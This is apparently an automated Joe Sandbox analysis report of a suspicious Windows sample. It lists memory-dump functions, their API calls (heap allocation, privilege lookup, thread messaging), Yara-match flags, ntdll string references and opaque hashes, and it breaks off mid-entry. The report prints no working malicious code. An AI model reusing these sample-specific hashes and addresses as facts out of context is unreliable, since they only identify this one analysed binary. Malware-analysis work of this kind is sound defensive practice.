Function 01AB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2D1A

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f40ef6c29028043ee8e709c84acd81b1394e3af30a2113d3698c1d31baaa06e
Instruction ID: 2d26a268c693238b571ae7fcab9accebfd837ff339f186b0569c53c9502cb1e5
Opcode Fuzzy Hash: 9f40ef6c29028043ee8e709c84acd81b1394e3af30a2113d3698c1d31baaa06e
Instruction Fuzzy Hash: B090022921340002D180715D540860A0005A7D1602F96D419A0015558CC91A89695321

Function 01AB2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2CAA

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c3fd4fa1136d3bdb47db52e3424991640f0039bebdfffffad4d43d155c4c763
Instruction ID: a81dc3dfb9caf011f0c269d63011835786de6161730173a86706f1d118fcac89
Opcode Fuzzy Hash: 4c3fd4fa1136d3bdb47db52e3424991640f0039bebdfffffad4d43d155c4c763
Instruction Fuzzy Hash: D990023120140402D100759D54086460005A7E0701F56D015A5024555EC66A89916231

Function 01AB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2C7A

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ad5c0032532081bc145c11f4a78b2ddde6824e870cb14c38854a0a802cea94f
Instruction ID: 8f8db41a1fb7503690cd63a5aeec39eb980d9ccc05a46b36c6368546e0550ebb
Opcode Fuzzy Hash: 8ad5c0032532081bc145c11f4a78b2ddde6824e870cb14c38854a0a802cea94f
Instruction Fuzzy Hash: 8090023120148802D110715D840474A0005A7D0701F5AC415A4424658DC69A89917221

Function 01AB2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2FBA

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe9b35ca9c728f91237cacbd3b00740923e14a4e340746bc1f05bd1925dca188
Instruction ID: f24fd9010751a4f49d0ab5956a3e7deab00b801fec7f9a95e78342cf4310a645
Opcode Fuzzy Hash: fe9b35ca9c728f91237cacbd3b00740923e14a4e340746bc1f05bd1925dca188
Instruction Fuzzy Hash: D9900221601400424140716D88449064005BBE1611B56C125A0998550DC55E89655765

Function 01AB2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2F9A

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 08d34d2169c969af550225478197e452f44d4350ae51380bbf300dddd61eb1e6
Instruction ID: 9e58677afb276e299da1a81458ac6fc733d215a27f0a23da6c4062786595bd74
Opcode Fuzzy Hash: 08d34d2169c969af550225478197e452f44d4350ae51380bbf300dddd61eb1e6
Instruction Fuzzy Hash: 1F90023120180402D100715D481470B0005A7D0702F56C015A1164555DC62A89516671

Function 01AB2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2FEA

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e97b992bbfa383573d93b5131b5ffaa1eb6f20ee5d92161de40f38ded197810d
Instruction ID: e6ffa0eaac7b9c326cbe00ad59d3414e36def2647b4d292c3be00572000865b7
Opcode Fuzzy Hash: e97b992bbfa383573d93b5131b5ffaa1eb6f20ee5d92161de40f38ded197810d
Instruction Fuzzy Hash: 8F900221211C0042D200756D4C14B070005A7D0703F56C119A0154554CC91A89615621

Function 01AB2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2F3A

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e1261167bf1771700a97ac6ea5f824b0a9247f6698b5613154d2f8faa8cd45d8
Instruction ID: 1162413fffb65add7935bb7ce8178e9db77eb6ab906477cc47bdea9ccc0e7f25
Opcode Fuzzy Hash: e1261167bf1771700a97ac6ea5f824b0a9247f6698b5613154d2f8faa8cd45d8
Instruction Fuzzy Hash: 0790026134140442D100715D4414B060005E7E1701F56C019E1064554DC61ECD526226

Function 01AB2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2EAA

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7b806f7c71fe86210187060a15cb8a38dfe2400624f990a10932e6ffe4da0979
Instruction ID: 77c0acedc33d69df4fe0885d982c2b25f7a323b0e018c9084d15587869755f65
Opcode Fuzzy Hash: 7b806f7c71fe86210187060a15cb8a38dfe2400624f990a10932e6ffe4da0979
Instruction Fuzzy Hash: 4B90027120140402D140715D44047460005A7D0701F56C015A5064554EC65E8ED56765

Function 01AB2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2E8A

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1d4c57b51250159e541baf552d3b3b6951da1d1f692f055d56bffe4e0286e6f
Instruction ID: 658a1697673351eb1a17d97149e6c563e612ddc6d11289f981f505d7e8002358
Opcode Fuzzy Hash: f1d4c57b51250159e541baf552d3b3b6951da1d1f692f055d56bffe4e0286e6f
Instruction Fuzzy Hash: F590022160140502D101715D4404616000AA7D0641F96C026A1024555ECA2A8A92A231

Function 00409AA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6ba40f36a446a34926a16e13db83a472e6b0eb4014504b183b686ffc875886
Instruction ID: aa195f0a0af1fd99cd61e52985a94cc4508177482d9610c79777d473fbad4be0
Opcode Fuzzy Hash: 9f6ba40f36a446a34926a16e13db83a472e6b0eb4014504b183b686ffc875886
Instruction Fuzzy Hash: D1213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A65D

Strings

&EA, xrefs: 0041A652, 0041A65C

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

Function 00408309 Relevance: 1.6, APIs: 1, Instructions: 58
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a9deb499662bcce9bf8bc78a4bb1f1fefe3221ce0d8095465ec87d1be3085402
Instruction ID: f3953570c60373893bf72e46575f7e09a002cef20f5442a3f0aca23ab0b73e4b
Opcode Fuzzy Hash: a9deb499662bcce9bf8bc78a4bb1f1fefe3221ce0d8095465ec87d1be3085402
Instruction Fuzzy Hash: 4C01F531A80368B7E721A6959C43FEE7B2C9B40F84F05015DFF44BA1C2E6E9690542EA

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2fef15b3573e963dab4dee3ae98b595d245d4acc25ee333acbb79ae82eec217e
Instruction ID: 918bfee87343fa17fe5f753d684441ffefb87cf5ca75bfa6275ae09e86d24780
Opcode Fuzzy Hash: 2fef15b3573e963dab4dee3ae98b595d245d4acc25ee333acbb79ae82eec217e
Instruction Fuzzy Hash: 99018471A8032C77E721A6959C43FFE776C6B40B94F05012AFF04BA1C1E6E8690546EA

Function 0041A662 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c43988574fa1a0ba8ae0e4f679689f6ce62e6a11d8302781c80a156eac68f0c0
Instruction ID: 54ae2cbc6702ca787e244acd037496ed0edeec7915d4c27fd7eefbb9cddf7d1e
Opcode Fuzzy Hash: c43988574fa1a0ba8ae0e4f679689f6ce62e6a11d8302781c80a156eac68f0c0
Instruction Fuzzy Hash: 0EE06DB12046096BD718DF59DC44EE73769EF89360F108249F9599B681C630E811CAB0

Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A800

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5

Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1

Function 0041A6A2 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: fa1596f2bbfb7b680c3c8b8504543c135f8c06b60b15b46c272c899b100820dc
Instruction ID: c387ada20a41deb9c929076bf405961b7e30563edced002ca138f5bb7bc86376
Opcode Fuzzy Hash: fa1596f2bbfb7b680c3c8b8504543c135f8c06b60b15b46c272c899b100820dc
Instruction Fuzzy Hash: 1EE08675605210ABEB11DF54CC85FD73768EF44750F05819CF9595B541C634A910C7A5

Function 01AB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2C24

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18a394972cb83de4fbbfea12d06d445737d710ebe54f1b2b6e478d68a9fbc4ba
Instruction ID: fa2039420d37fde2758571e86af4b8004645c00b26c2c0a0e5977c5291e6ce5c
Opcode Fuzzy Hash: 18a394972cb83de4fbbfea12d06d445737d710ebe54f1b2b6e478d68a9fbc4ba
Instruction Fuzzy Hash: 04B09B719015C5C5DA11E76446087177A0477D1701F16C077D2030641F473DD5D1F275

Non-executed Functions

Function 01AF2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

FrontEndHeapDebugOptions, xrefs: 01AF2489
GlobalFlag2, xrefs: 01AF2FC0
DisableHeapLookaside, xrefs: 01AF246D
DisableExceptionChainValidation, xrefs: 01AF275F
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01AF3176
@, xrefs: 01AF2B74
UseImpersonatedDeviceMap, xrefs: 01AF251C
RaiseExceptionOnPossibleDeadlock, xrefs: 01AF2579
minkernel\ntdll\ldrinit.c, xrefs: 01AF3187
LdrpInitializeExecutionOptions, xrefs: 01AF317D
GlobalFlag, xrefs: 01AF2F3F, 01AF3059
ExecuteOptions, xrefs: 01AF25A0
@, xrefs: 01AF2942
MaxDeadActivationContexts, xrefs: 01AF2D82
TracingFlags, xrefs: 01AF2549
UnloadEventTraceDepth, xrefs: 01AF24C0
ShutdownFlags, xrefs: 01AF24A1
MinimumStackCommitInBytes, xrefs: 01AF2BB0
MaxLoaderThreads, xrefs: 01AF24EC
CFGOptions, xrefs: 01AF2967

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: b31660db631d30821db2d32f1feec1f1db5e4bce0baee2d11aba271373a6a607
Instruction ID: 24fe24ca781862cc3c9aa876f7682a0040a569d639c9bf69c100010dd555f651
Opcode Fuzzy Hash: b31660db631d30821db2d32f1feec1f1db5e4bce0baee2d11aba271373a6a607
Instruction Fuzzy Hash: 34928E71604742ABE721DF68C880B6BBBE8BF84754F04492EFB94D7291D774E844CB92

Function 01AA8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread is in a state in which it cannot own a critical section, xrefs: 01AE5543
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AE54E2
Critical section address., xrefs: 01AE5502
Address of the debug info found in the active list., xrefs: 01AE54AE, 01AE54FA
Critical section address, xrefs: 01AE5425, 01AE54BC, 01AE5534
double initialized or corrupted critical section, xrefs: 01AE5508
corrupted critical section, xrefs: 01AE54C2
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AE54CE
undeleted critical section in freed memory, xrefs: 01AE542B
8, xrefs: 01AE52E3
Thread identifier, xrefs: 01AE553A
Invalid debug info address of this critical section, xrefs: 01AE54B6
Critical section debug info address, xrefs: 01AE541F, 01AE552E
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AE540A, 01AE5496, 01AE5519

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 030f6cda555a2be4d33c421e661c924cc379ef8a1d7a50ecbc30c227f0602f21
Instruction ID: 10269e6d5aa1a5b3bf82fe20f429ba704f150d6d94076019611e3647456ab994
Opcode Fuzzy Hash: 030f6cda555a2be4d33c421e661c924cc379ef8a1d7a50ecbc30c227f0602f21
Instruction Fuzzy Hash: C3819B74E40349BFEB60CF9AD945BAEBBF9BB08718F144119F904B7291D379A940CB60

Function 01AA29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01AE2412
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01AE2409
RtlpResolveAssemblyStorageMapEntry, xrefs: 01AE261F
@, xrefs: 01AE259B
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01AE25EB
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01AE22E4
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01AE2506
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01AE2624
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01AE2602
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01AE24C0
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01AE2498

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: eec910a14e32fa120da6d5cf0313fee86cdeea0900d7ea374e96ceea430b5cf6
Instruction ID: 10de3d2c8bf8aabb1f482e0492ec29844a548070359e4fb13733f66a5acb93de
Opcode Fuzzy Hash: eec910a14e32fa120da6d5cf0313fee86cdeea0900d7ea374e96ceea430b5cf6
Instruction Fuzzy Hash: 960260F1D002299BDB31DF54CD84BEAB7B8AF54304F4441EAE609A7242DB319E94CF69

Function 01B18B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

lsass.exe, xrefs: 01B18BA1
services.exe, xrefs: 01B18B96
heapType, xrefs: 01B18BCB
smss.exe, xrefs: 01B18B8B
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01B18BD0
csrss.exe, xrefs: 01B18B80
svchost.exe, xrefs: 01B18B68
runtimebroker.exe, xrefs: 01B18B73
DefaultBrowser_NOPUBLISHERID, xrefs: 01B18D00
SegmentHeap, xrefs: 01B18BE9

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: af5e153111d1c1525f4898f34c3d9b708a0d41529cc403d1f139af1ebddf6467
Instruction ID: 9f89f289cadb50c127c228291049cac178c95741ad2f7b4bf5e19a04d0e91471
Opcode Fuzzy Hash: af5e153111d1c1525f4898f34c3d9b708a0d41529cc403d1f139af1ebddf6467
Instruction Fuzzy Hash: 855100B12043419BD72ACF188984BABBBECFFD4240F950A5DF949C3285E770D644CB92

Function 01B20274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Just reallocated block at %p to %Ix bytes, xrefs: 01B205F1
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01B206EA
HEAP[%wZ]: , xrefs: 01B20399, 01B204A8, 01B205D0, 01B20675, 01B206CC
HEAP: , xrefs: 01B203A6, 01B204B5, 01B205DD, 01B20682, 01B206D9
About to reallocate block at %p to %Ix bytes, xrefs: 01B203BA
RtlReAllocateHeap, xrefs: 01B202BF, 01B20362
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01B2069F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01B204D3

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 30b30f9c1e1bfc212f754cf793ea8b0b7374a05cbb779eddad5534b0b1dc3ee2
Instruction ID: 49f6b613bcee8621fd56dd7f767849ad4b801e91006cf5ba1d12c9ba81bedd73
Opcode Fuzzy Hash: 30b30f9c1e1bfc212f754cf793ea8b0b7374a05cbb779eddad5534b0b1dc3ee2
Instruction Fuzzy Hash: 03D10731600695EFDB2AEF68C440AADBFF1FF5A710F188099F4499B662C739D949CB10

Function 01AF89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01AF8A3D
VerifierDlls, xrefs: 01AF8CBD
VerifierFlags, xrefs: 01AF8C50
HandleTraces, xrefs: 01AF8C8F
VerifierDebug, xrefs: 01AF8CA5
AVRF: -*- final list of providers -*- , xrefs: 01AF8B8F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01AF8A67

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: b7ad589c2644ea32eb5ab0cc05f3ff4ff95c5f9664b9608af10c4868e818522b
Instruction ID: 1b48e5c48088b67a7200b498efbbc191abf9c58e63d227b1e150c4b3731ee3fa
